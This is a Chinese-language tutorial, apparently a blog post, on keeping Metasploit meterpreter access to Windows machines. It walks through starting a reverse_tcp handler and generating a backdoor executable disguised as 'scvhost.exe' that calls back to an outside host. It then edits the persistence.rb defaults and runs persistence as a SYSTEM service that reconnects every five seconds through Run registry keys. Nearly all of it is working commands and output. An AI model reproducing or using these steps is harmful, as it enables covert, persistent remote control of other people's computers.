关于 meterpreter 持久化问题研究

meterperter 获取到Session时如果当前session退出,就不会在自动连接,使用常见持久化也只是在远程用户登录,或者远程机器重启时才会返回session。今天主要介绍persistence脚本的自定义配置,来实现如果session断开,客户端定时重新尝试连接服务端(msf端)

0x00 建立连接

服务端启动msf并监听端口等待session

后台监听端口
1
2
3
4
5
6
7
8
9
10
msf> handler -p windows/meterpreter/reverse_tcp -H 0.0.0.0 -P 33333
msf> jobs
Jobs
====
Id Name Payload Payload opts
-- ---- ------- ------------
5 Exploit: multi/handler windows/meterpreter/reverse_tcp tcp://0.0.0.0:33333

生成后门文件客户端执行建立连接:

不免杀,本文不做介绍
1
2
3
msf> msfvenom -p windows/meterpreter/reverse_tcp lhost=b1g-d1ck.kionf.com lport=33333 -f exe > scvhost.exe
# lhost为远程主机
# lport为远程主机端口
kionf

获取到客户端session,指定session id 进入meterpreter会话

1
2
3
4
5
msf> session -i 6
[*] Starting interaction with 6...
meterpreter >

0x01 persistence脚本持久化


当使用run persistence进行持久化时默认远程路径会推送到%TEMP%(“c:\users\appdata\local\temp\“)。当用户重启或者temp目录下存在数字id,persistence持久化就会出错。

metasploit 新版本已不推荐使用此脚本,并且使用run persistence -h 查看选项信息时会报错,所以分析直接脚本文件

分析persistenceruby脚本文件/usr/share/metasploit-framework/scripts/meterpreter/persistence.rb

vim打开:set nu显示行号,根据名称可自行分析更改配置

代码片段,此代码段为默认配置
14 key = "HKLM"
15
16 # Default parameters for payload
17 rhost = Rex::Socket.source_address("b1g-d1ck.kionf.com")
18 rport = 33333
19 delay = 10
20 install = false
21 autoconn = false
22 serv = false
23 altexe = nil
24 target_dir = nil
25 payload_type = "windows/meterpreter/reverse_tcp"
26 script = nil
27 script_on_target = nil


此代码段为帮助信息
31 "-h" => [ false, "This help menu"],
32 "-r" => [ true, "The IP of the system running Metasploit listening for the connect back"],
33 "-p" => [ true, "The port on which the system running Metasploit is listening"],
34 "-i" => [ true, "The interval in seconds between each connection attempt"],
35 "-X" => [ false, "Automatically start the agent when the system boots"],
36 "-U" => [ false, "Automatically start the agent when the User logs on"],
37 "-S" => [ false, "Automatically start the agent on boot as a service (with SYSTEM privileges)"],
38 "-A" => [ false, "Automatically start a matching exploit/multi/handler to connect to the agent"],
39 "-L" => [ true, "Location in target host to write payload to, if none \%TEMP\% will be used."],
40 "-T" => [ true, "Alternate executable template to use"],
41 "-P" => [ true, "Payload to use, default is windows/meterpreter/reverse_tcp."]


高亮部分为常用配置项

汉化版
-h 帮助信息
-r 远程服务端监听端口
-p 远程服务端监听端口
-i 每隔几秒重试连接
-X 更随系统自启动
-U 当用户登录时自启动
-S 作为服务启动
-A 服务端自动建立handler监听服务
-L 后门传到远程主机的位置默认为%TEMP%
-T 配置模版
-P 使用的Payload,默认windows/meterpreter/reverse_tcp

根据选项帮助提示执行持久化命令:

1
2
3
meterpreter > run persistence -S -i 5 -p 33333 -r b1g-d1ck.kionf.com -L c:\\Windows\\System32
# 脚本注册自启动注册表位置:HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run

0x02 测试

测试退出当前session。ok 5秒后session又自动连接回来了

kionf

注:

增删改查注入自启动注册表
# 查询Key
meterpreter > reg enumkey -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run
Enumerating: HKLM\Software\Microsoft\Windows\CurrentVersion\Run
Values (3):
SysTeM32
MDxTmrUjRGnvIaT
UxMvAJkbedJu
# 查询Values
meterpreter > reg queryval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -v UxMvAJkbedJu
Key: HKLM\Software\Microsoft\Windows\CurrentVersion\Run
Name: UxMvAJkbedJu
Type: REG_SZ
Data: c:\Windows\System32\ANoZYsNFQVe.vbs
# 删除Values
meterpreter > reg deleteval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -v MDxTmrUjRGnvIaT
Successfully deleted MDxTmrUjRGnvIaT.

/usr/share/metasploit-framework/scripts/ 此目录存放run脚本
/usr/share/metasploit-framework/modules/ 此目录存放各种脚本
懵逼的时候直接自己进去看脚本。